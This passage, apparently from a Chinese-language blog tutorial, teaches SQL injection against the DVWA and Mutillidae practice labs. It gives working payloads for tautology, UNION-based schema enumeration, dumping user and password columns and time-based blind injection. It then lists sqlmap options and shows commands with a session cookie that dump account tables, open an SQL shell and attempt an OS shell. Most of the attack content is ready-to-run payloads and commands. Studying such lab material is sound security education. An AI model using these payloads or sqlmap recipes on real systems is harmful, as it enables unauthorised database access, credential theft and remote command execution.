<p><img src="http://ww1.sinaimg.cn/large/007JdRFxgy1g24jeovndzj30vq0l9my7.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">原始语句：mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">where</span> user_id=<span class="string">'$id'</span>;</span><br><span class="line"></span><br><span class="line">SQL注入语句：<span class="string">' or 1 = 1 -- '</span></span><br><span class="line">生成的SQL语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span> <span class="keyword">or</span> <span class="number">1</span> = <span class="number">1</span> -- <span class="string">''</span></span><br><span class="line">说明：</span><br><span class="line">第一个单引号<span class="string">' 用于闭合前面的语句(条件)</span></span><br><span class="line"><span class="string">or 1 = 1 代表为真的条件</span></span><br><span class="line"><span class="string">-- 将注释后面的语句</span></span><br></pre></td></tr></table></figure></p>
<h5 id="基于UNION注入"><a href="#基于UNION注入" class="headerlink" title="基于UNION注入"></a>基于UNION注入</h5><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">UNION语句用于联合前面的SELECT查询语句，合并查询更多信息；</span><br><span class="line">一般通过错误和布尔注入确认注入点之后，便开始通过<span class="class"><span class="keyword">union</span>语句来获取有效信息</span></span><br></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">//猜测数据列数</span><br><span class="line">' UNION <span class="keyword">SELECT</span> <span class="number">1</span> <span class="comment">-- '</span></span><br><span class="line"><span class="string">' UNION SELECT 1,2 -- '</span></span><br><span class="line">生成的<span class="keyword">SQL</span>语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">1</span> <span class="comment">-- ''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">1</span>,<span class="number">2</span> <span class="comment">-- ''</span></span><br><span class="line"></span><br><span class="line">//获得当前数据库及用户信息</span><br><span class="line"><span class="string">'UNION SELECT VERSION(), DATABASE() -- '</span></span><br><span class="line"><span class="string">'UNION SELECT USER(), DATABASE() -- '</span></span><br><span class="line">生成的<span class="keyword">SQL</span>语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="keyword">VERSION</span>(),<span class="keyword">DATABASE</span>() <span class="comment">-- ''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="keyword">USER</span>(),<span class="keyword">DATABASE</span>() <span class="comment">-- ''</span></span><br><span class="line">说明：</span><br><span class="line"><span class="keyword">VERSION</span>() 获取数据库版本信息</span><br><span class="line"><span class="keyword">DATABASE</span>() 获取当前数据库名</span><br><span class="line"><span class="keyword">USER</span>() 获取当前用户名</span><br><span class="line"></span><br><span class="line">//查询数据中的所有表</span><br><span class="line">information_schema数据库是MySQL自带的，它提供了数据元数据的访问方式。</span><br><span class="line">元数据包括数据的库名、表名、列数据类型、访问权限、字符集等基础信息。</span><br><span class="line">网站注入时，MySQL <span class="number">5.0</span>以上以及<span class="number">5.0</span>一下的区别？</span><br><span class="line"><span class="number">5.0</span>以下没有information_schema</span><br><span class="line"><span class="number">5.0</span>以下是多用户单操作，<span class="number">5.0</span>以上是多用户多操做。</span><br><span class="line"><span class="keyword">SQL</span>注入语句解析：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> * <span class="keyword">FROM</span> INFORMATION_SCHEMA.TABLES\G</span><br><span class="line"></span><br><span class="line">//查询所有库名</span><br><span class="line"><span class="string">'UNION SELECT TABLE_SCHEMA,1 FROM INFORMATION_SCHEMA.tables -- '</span></span><br><span class="line">生成的<span class="keyword">SQL</span>语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> TABLE_SCHEMA,<span class="number">1</span> <span class="keyword">FROM</span> INFORMATION_SCHEMA.tables <span class="comment">-- ''</span></span><br><span class="line">//查询所库中所有表名</span><br><span class="line"><span class="string">'UNION SELECT table_name,1 FROM INFORMATION_SCHEMA.tables -- '</span></span><br><span class="line">生成的<span class="keyword">SQL</span>语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> table_name,<span class="number">1</span> <span class="keyword">FROM</span> INFORMATION_SCHEMA.tables <span class="comment">-- ''</span></span><br><span class="line"></span><br><span class="line">//同时查询表名以及对应库名</span><br><span class="line"><span class="string">'UNION SELECT TABLE_SCHEMA,table_name FROM INFORMATION_SCHEMA.tables -- '</span></span><br><span class="line">生成的<span class="keyword">SQL</span>语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> TABLE_SCHEMA,table_name <span class="keyword">FROM</span> INFORMATION_SCHEMA.tables <span class="comment">-- ''</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24jrt7gqtj30xd0jjdgr.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24jrt4xjnj30w50jiwfe.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24tdklru9j30vm0i00ue.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">原始语句：mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">where</span> user_id=<span class="string">'$id'</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询数据表</span></span><br><span class="line"><span class="string">'UNION SELECT column_name,1 FROM INFORMATION_SCHEMA.columns WHERE table_name='</span>users<span class="string">' -- '</span></span><br><span class="line"><span class="string">'UNION SELECT column_name,1 FROM INFORMATION_SCHEMA.columns WHERE table_name='</span>USER_PRIVILEGES<span class="string">' -- '</span></span><br><span class="line"><span class="string">'UNION SELECT column_name,1 FROM INFORMATION_SCHEMA.columns WHERE table_name='</span>SCHEMA_PRIVILEGES<span class="string">' -- '</span></span><br><span class="line">生成的SQL语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> column_name,<span class="number">1</span> <span class="keyword">from</span> INFORMATION_SCHEMA.columns <span class="keyword">WHERE</span> table_name=<span class="string">'users'</span> -- <span class="string">''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> column_name,<span class="number">1</span> <span class="keyword">from</span> INFORMATION_SCHEMA.columns <span class="keyword">WHERE</span> table_name=<span class="string">'USER_PRIVILEGES'</span> -- <span class="string">''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> column_name,<span class="number">1</span> <span class="keyword">from</span> INFORMATION_SCHEMA.columns <span class="keyword">WHERE</span> table_name=<span class="string">'SCHEMA_PRIVILEGES'</span> -- <span class="string">''</span></span><br><span class="line"><span class="comment">//查询数据列</span></span><br><span class="line"><span class="string">'UNION SELECT NULL, user FROM users -- '</span></span><br><span class="line"><span class="string">'UNION SELECT NULL, password FROM usedrs -- '</span></span><br><span class="line"><span class="string">'UNION SELECT user, password FROM users -- '</span></span><br><span class="line"><span class="string">'UNION SELECT password, concat(first_name,'</span> <span class="string">' ,last_name,'</span> <span class="string">',user) FROM users -- '</span></span><br><span class="line">生成的SQL语句：</span><br><span class="line">mysql&gt; use dvwa;</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> NULL, user <span class="keyword">FROM</span> users -- <span class="string">''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> NULL, password <span class="keyword">FROM</span> users -- <span class="string">''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> user, password <span class="keyword">FROM</span> users -- <span class="string">''</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">WHERE</span> user_id=<span class="string">''</span><span class="keyword">UNION</span> <span class="keyword">SELECT</span> password, <span class="keyword">concat</span>(first_name,<span class="string">' '</span> ,last_name,<span class="string">' '</span>,user) <span class="keyword">FROM</span> users -- <span class="string">''</span></span><br><span class="line">说明：</span><br><span class="line"><span class="keyword">concat</span>() 将多个字符串连接成一个字符串。</span><br><span class="line">group_concat() 该函数返回带有来自一个组的连接的非NULL值的字符串结果。</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24tvbpudnj30vd0f7my9.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25bqsn9fvj30rr0ddgoo.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25cyoljcxj30un0epaaw.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25d0cage8j30rs072js9.jpg" alt=""></p>
<h5 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h5><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">有些数据库错误做了安全配置,使得无法通过以上方式探测到注入点，此时，通过设置<span class="built_in">sleep</span>()函数来探测注入点。</span><br></pre></td></tr></table></figure>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//sleep()函数</span></span><br><span class="line"><span class="number">1</span>' <span class="keyword">and</span> <span class="built_in">sleep</span>(<span class="number">5</span>)  -- '</span><br><span class="line">生成的SQL语句：</span><br><span class="line">mysql&gt; <span class="built_in">SELECT</span> first_name,last_name FROM dvwa.users <span class="built_in">WHERE</span> user_id='<span class="number">1</span>' <span class="keyword">and</span> <span class="built_in">sleep</span>(<span class="number">5</span>)  -- ''</span><br><span class="line">说明：</span><br><span class="line"><span class="built_in">sleep</span>() 让sql执行的时候<span class="built_in">sleep</span>(<span class="built_in">pause</span>)一段时间。</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25daoirc3j30uq0d4aap.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25dmryxvfj30v50e975c.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25dnm8i6xj30k701pmxi.jpg" alt=""></p>
<h4 id="SQLmap自动化注入（基础）"><a href="#SQLmap自动化注入（基础）" class="headerlink" title="SQLmap自动化注入（基础）"></a>SQLmap自动化注入（基础）</h4><blockquote>
<p>SQL注入比较好用的工具，首推开源工具SQLmap。SQLmap是一个国内外著名的安全稳定性测试工具，可以用来自动化检测，利用SQL注入漏洞，获取数据库服务器权限。它具有功能强大的检测引擎，针对各种不同类型数据库的安全稳定性测试功能选项，包括获取数据中存储的数据，访问操作文件甚至可以通过外带数据连接方式执行操作系统命令。<br><br>SQLmap支持MySQL,Oracle,PostgreSQL,Microsoft,SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ethc1rcj30rv0frdrk.jpg" alt=""></p>
</blockquote>
<h5 id="常见参数及语句解析"><a href="#常见参数及语句解析" class="headerlink" title="常见参数及语句解析"></a>常见参数及语句解析</h5><figure class="highlight haml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">-<span class="ruby">-batch 批处理(自动化完成)</span></span><br><span class="line"><span class="ruby">--level 等级</span></span><br><span class="line"><span class="ruby">--risk 风险</span></span><br><span class="line"><span class="ruby">--dbms 指定数据库类型</span></span><br><span class="line"><span class="ruby">--proxy=PROXY 指定代理</span></span><br><span class="line"><span class="ruby">--dbs 获取所有数据库</span></span><br><span class="line"><span class="ruby">--users 获取用户</span></span><br><span class="line"><span class="ruby">--current-db 获取当前数据库</span></span><br><span class="line"><span class="ruby">--current-user 当前用户</span></span><br><span class="line"><span class="ruby">--sql--shell 创建一个sql的shell</span></span><br><span class="line"><span class="ruby">--os-shell 创建一个对方操作系统的shell，远程执行系统命令</span></span><br><span class="line"><span class="ruby">--os-cmd=OSCMD 执行一句系统命令</span></span><br><span class="line"><span class="ruby">--cookie=COOKIE 指定测试时使用的cookie，通常在一些需要登录的站点会使用</span></span><br><span class="line"><span class="ruby">--dump-all 查询全部数据</span></span><br><span class="line"><span class="ruby">--dump-all --exclude-sysdbs 查询全部数据，排除系统库</span></span><br><span class="line"><span class="ruby">-h 查看帮助</span></span><br><span class="line"><span class="ruby">-hh 查看全部帮助</span></span><br><span class="line"><span class="ruby">–data=DATA 通过POST发送的数据字符串</span></span><br><span class="line"><span class="ruby">–smart 有时对目标非常多的URL进行测试，为节省时间，只对能够快速判断为注入的报错点进行注入，可以使用此参数。</span></span><br><span class="line"><span class="ruby">-p 指定某个参数</span></span><br><span class="line"><span class="ruby">-u 指定url</span></span><br><span class="line"><span class="ruby">-x 站点地图，提交给sql一个xml文件</span></span><br><span class="line"><span class="ruby">-r 可以将一个post请求方式的数据包保存在一个txt中，sqlmap会通过post方式检测目标</span></span><br><span class="line"><span class="ruby">-g 使用google引擎搜索类似的网址，并且多目标检测</span></span><br><span class="line"><span class="ruby">-D <span class="string">"database_name"</span> --tables 获取某个库里的表数据 </span></span><br><span class="line"><span class="ruby">-D <span class="string">"database_name"</span> -T <span class="string">"table_name"</span> --columns 某个库某个表的列信息</span></span><br><span class="line"><span class="ruby">-D <span class="string">"database_name"</span> -T <span class="string">"table_name"</span> --dump 查询指定某个库某个表里全部数据</span></span><br><span class="line"><span class="ruby">-D <span class="string">"database_name"</span> -T <span class="string">"table_name"</span> -C <span class="string">"username,password"</span> --dump 查询指定字段数据</span></span><br><span class="line"><span class="ruby">...</span></span><br></pre></td></tr></table></figure>
<p>示例步骤：<br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# sqlmap -u "http://192.168.203.22/mutillidae/<span class="keyword">index</span>.php?page=<span class="keyword">user</span>-info.php&amp;username=admin&amp;<span class="keyword">password</span>=admin&amp;<span class="keyword">user</span>-info-php-submit-button=<span class="keyword">View</span>+Account+Details<span class="string">" -p username --batch</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25kg8fgyqj30tf0i4aol.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取所有数据库</span><br><span class="line">root@kali:~# sqlmap -u "http://192.168.203.22/mutillidae/<span class="keyword">index</span>.php?page=<span class="keyword">user</span>-info.php&amp;username=admin&amp;<span class="keyword">password</span>=admin&amp;<span class="keyword">user</span>-info-php-submit-button=<span class="keyword">View</span>+Account+Details<span class="string">" -p username --batch --dbs</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25kj5bpwej30th0hxamm.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取当前数据库</span><br><span class="line">root@kali:~# sqlmap -u "http://192.168.203.22/mutillidae/<span class="keyword">index</span>.php?page=<span class="keyword">user</span>-info.php&amp;username=admin&amp;<span class="keyword">password</span>=admin&amp;<span class="keyword">user</span>-info-php-submit-button=<span class="keyword">View</span>+Account+Details<span class="string">" --batch --current-db</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25mx782w3j30th0f6dtt.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取当前用户</span><br><span class="line">root@kali:~# sqlmap -u "http://192.168.203.22/mutillidae/<span class="keyword">index</span>.php?page=<span class="keyword">user</span>-info.php&amp;username=admin&amp;<span class="keyword">password</span>=admin&amp;<span class="keyword">user</span>-info-php-submit-button=<span class="keyword">View</span>+Account+Details<span class="string">" --batch --current-user</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25mxvijnsj30ti0hm7ii.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取数据库表</span><br><span class="line">root@kali:~# sqlmap -u "http://192.168.203.22/mutillidae/<span class="keyword">index</span>.php?page=<span class="keyword">user</span>-info.php&amp;username=admin&amp;<span class="keyword">password</span>=admin&amp;<span class="keyword">user</span>-info-php-submit-button=<span class="keyword">View</span>+Account+Details<span class="string">" --batch -D 'nowasp' --tables</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25n9d7ofbj30tf0hpk4i.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取表的字段</span><br><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/mutillidae/index.php?page=user-info.php&amp;username=admin&amp;password=admin&amp;user-info-php-submit-button=View+Account+Details"</span> --batch -D <span class="string">'nowasp'</span> -T <span class="string">'accounts'</span> --columns</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ngjb91zj30tl0g7nab.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取表中数据</span><br><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/mutillidae/index.php?page=user-info.php&amp;username=admin&amp;password=admin&amp;user-info-php-submit-button=View+Account+Details"</span> --batch -D <span class="string">'nowasp'</span> -T <span class="string">'accounts'</span> -C <span class="string">'username,password'</span> --dump</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25nkfofgcj30tv0ig4bd.jpg" alt=""></p>
<blockquote>
<p>需要带cookie才能访问的注入页面,–cookie=”” <br><br>Cookie：Cookie意为“甜饼”，是由W3C组织提出，最早由Netscape社区发展的一种机制。目前Cookie已经成为标准，所有的主流浏览器如IE、Netscape、Firefox、Opera等都支持Cookie。<br><br>由于HTTP是一种无状态的协议，服务器单从网络连接上无从知道客户身份。怎么办呢？就给客户端们颁发一个通行证吧，每人一个，无论谁访问都必须携带自己通行证。这样服务器就能从通行证上确认客户身份了。</p>
</blockquote>
<p>示例步骤：<br></p>
<blockquote>
<p>获取cookie（firefox插件：Cookies Quick Manager、Cookiebro等）<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25nxhxcwoj30uf0huq3t.jpg" alt=""><br><figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">@kali:</span>~# sqlmap -u <span class="string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span></span><br></pre></td></tr></table></figure></p>
</blockquote>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25obzulzrj30tg0hjk54.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取当前数据库</span><br><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span> --current-db</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25oi5fstlj30tv0ifdty.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//获取数据库表</span><br><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span> -D <span class="string">'dvwa'</span> --tables</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25oidom5uj30tv0ifws3.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span> -D <span class="string">'dvwa'</span> -T <span class="string">'users'</span> --columns</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ok1ch2wj30tv0ifgyr.jpg" alt=""><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root<span class="symbol">@kali</span>:~<span class="meta"># sqlmap -u <span class="string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span> -D <span class="string">'dvwa'</span> -T <span class="string">'users'</span> -C <span class="string">'user,password'</span> --dump</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ollds54j30tv0ifqi1.jpg" alt=""></p>
<h5 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h5><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//与数据库交互 --sql-shell</span></span><br><span class="line">root@kali:~<span class="meta"># sqlmap -u <span class="meta-string">"http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#"</span> --batch --cookie <span class="meta-string">"PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1"</span> --sql-shell</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q8opahoj30tv0ifk5s.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql-shell&gt; <span class="keyword">select</span> * <span class="keyword">from</span> users;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q92uqw7j30tv0ifwto.jpg" alt=""></p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//与操作系统交互--os-<span class="keyword">shell</span><span class="bash">、</span></span><br><span class="line"><span class="bash">需要一定的条件,否则无法创建os-shell</span></span><br><span class="line"><span class="bash">需要一定的条件：</span></span><br><span class="line"><span class="bash">                网站必须是root权限 <span class="comment"># --is-dba</span></span></span><br><span class="line"><span class="bash">                攻击者需要知道网站的绝对路径 <span class="comment"># 可以利用SQL语言查看@@datadir</span></span></span><br><span class="line"><span class="bash">                GPC为off，php主动转义的功能关闭<span class="comment"># php.ini文件</span></span></span><br><span class="line"><span class="bash">                secure_file_priv为空白 <span class="comment">#查询select @@secure_file_priv</span></span></span><br><span class="line"><span class="bash">root@kali:~<span class="comment"># sqlmap -u "http://192.168.203.22/dvwa/vulnerabilities/sqli/?id=111&amp;Submit=Submit#" --batch --cookie "PHPSESSID=0sctqa3r895dnmb4f9vt4r14s1;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada;showhints=1" --os-shell</span></span></span><br></pre></td></tr></table></figure>
<p>提示失败<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q97np26j30tv0if7k8.jpg" alt=""></p>
<h5 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h5><blockquote>
